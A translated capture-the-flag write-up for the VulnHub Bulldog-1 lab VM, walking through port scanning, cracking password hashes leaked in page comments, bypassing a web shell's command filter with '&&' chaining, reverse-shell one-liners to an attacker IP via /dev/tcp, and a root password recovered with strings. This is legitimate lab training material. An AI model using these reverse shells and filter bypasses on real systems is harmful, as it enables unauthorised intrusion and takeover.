bulldog-1 target write up

0x00 environment construction

  • Download link

      https://download.vulnhub.com/bulldog/bulldog.ova
    
  • target
    Get root permission to read flag

  • Operating environment
    Target VM virtual machine startup
    Attack machine kali win10

  • Target ip problem

(1) Set nat mode to the same network segment as kali

(2) If it is set to nat, kali can't scan the target ip. Try this

[1] Restart the target to the startup page and select the advanced option of the second ubuntu.

[2] Continue to select the second option

[3] Select root and press enter to enter command line mode

[4] mount -o rw,remount /
[5] ifconfig -a displays the information of all network cards, including those not up
[6] vim /etc/network/interfaces modify the network card name
[7] All changed to 33
[8] reboot

[9] To kali scan network segment test

If you have any questions, try again
I changed it at first, but I still didn't respond. I tried it several times, but I still couldn't,
Then delete the target file, re import the target, and modify the ip again.

0x01 information collection

  • ip detection

    netdiscover -i eth0 -r  192.168.157.0/24
    

  • Port and service identification

      masscan -p 1-65535 --rate=1000 192.168.157.161
    
      nmap -A -sC -sV -p 80,23,8080 192.168.157.161 -o 	port.tx
    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 16:34 CST
Nmap scan report for 192.168.157.161
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 00:0C:29:27:6E:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.157.161

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds

23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; proto

80/tcp open http WSGIServer 0.1 (Python 2.7.12)

8080/tcp open http WSGIServer 0.1 (Python 2.7.12)

OS details: Linux 3.2 - 4.9

0x02 vulnerability mining

web vulnerability thinking

(1) Blast the directory to see the functions and source code of various web pages to find loopholes
(2) See whether there are cms and other framework vulnerabilities for direct utilization.
If there is no manual bp search, you can also start awvs appscan xray scanning.

ssh utilization ideas

(1) Use Hydra to run weak passwords. If there is a user name, you need to see whether there is a weak password in the dictionary.
(2) The account and password obtained from the web can also be tried. It is likely to be an ssh password.

Step 1: browse the web directory

(1) kali and win10 blasting tools
/robots.txt
/admin/login / login box
/dev
(2) Browse the home page and click on each point
Click only one / notice / no utilization point
(3) Look at the exploded page
/The admin/login / page is a login box made by Django framework
/robots.txt is useless
/Too many dev contents
Useful information is

Click web shell to jump to
http://192.168.157.161/dev/shell/
Certification is required to use

Review the / dev source code and find that there is a hash of the useful information password left by the web developer when testing
Attempt to decrypt login

	<!--Need these password hashes for testing. Django's default is too complex-->
	<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
	Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->

Step 2: crack the hash

Finally, the last two passwords are obtained after online decryption

Mailbox nick@bulldogindustries.com
Password bulldog (cmd5)

Mailbox sarah@bulldogindustries.com
Password bulldoglover (somd5)

Step 3: log in to the background with password

(1) After logging in with the mailbox @ as the user name and password, it will be displayed that there is no operation permission.
(2) ssh login 23 failed
(3) Think of the web shell access that needs authentication just now
Successful authentication is a command execution interface

Step 4: execute with command (try to bypass the method)

After the test, many commands will be blocked by the web page and try to bypass them
It is tested that the splicing command (allowed) & & (not allowed) can be used to bypass

such as
id not executed
Ls & & ID execute as

Step 5: Bounce shell

(1)

	ls && bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8080 <&1'

(2) You can also directly use echo to execute the rebound shell

echo "bash -i >& /dev/tcp/192.168.157.137/8080 0>&1" | bash

First try the echo output command and input it into bash.

Both methods can rebound successfully

0x03 lifting authority

Step 6: check the system users and determine the users that need attention

/bin/bash has two users, django and bulldogadmin

Step 7: find each user's file

(1) Look at bulldogadmin first

find / -user bulldogadmin 2>/dev/null  

Show only non error
(2 > / dev/null means redirecting the standard error to / dev/null, which is commonly known as a black hole in the empty file of the linux device)

(2) Two files were found in a hidden directory

/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
/home/bulldogadmin/.hiddenadmindirectory/note

(3) The note file should be a text file and directly cat printed out

cat /home/bulldogadmin/.hiddenadmindirectory/note

(4) App looks like executing file strings. Print the printable file characters and have a look

strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp

Step 8: splicing root password and raising rights

SUPERultH
imatePASH
SWORDyouH
CANTget

Remove H

SUPERultimatePASSWORDyouCANTget

It could be a password

su 

must be run from a terminal
Must run from one terminal

Convert the shell to fully interactive tty terminal mode with the following command

 python -c 'import pty; pty.spawn("/bin/bash")' 

again

su

Error su: Authentication failure

need

sudo su
SUPERultimatePASSWORDyouCANTget

cd ..
cat congrats.txt

0x04 summary of ideas

1. Use directory explosion to find a webshell page from the exploded / dev page content, and view the account and password required for authentication in the source code.
2. The operating system commands can be executed by using the webshell page, and direct bash rebound is prohibited. Find a way to bypass echo. First output the command | input it into bash or ls&&id bypass it.
3. Get the shell backward file to see if there are clues such as password.
4. The Su command reports an error must be run from a terminal
python environment can
python -c 'import pty;pty.spawn("/bin/bash")'
Convert the shell to terminal (tty) mode.

Tags: Linux network security

Posted on Tue, 30 Nov 2021 11:04:20 -0500 by HFD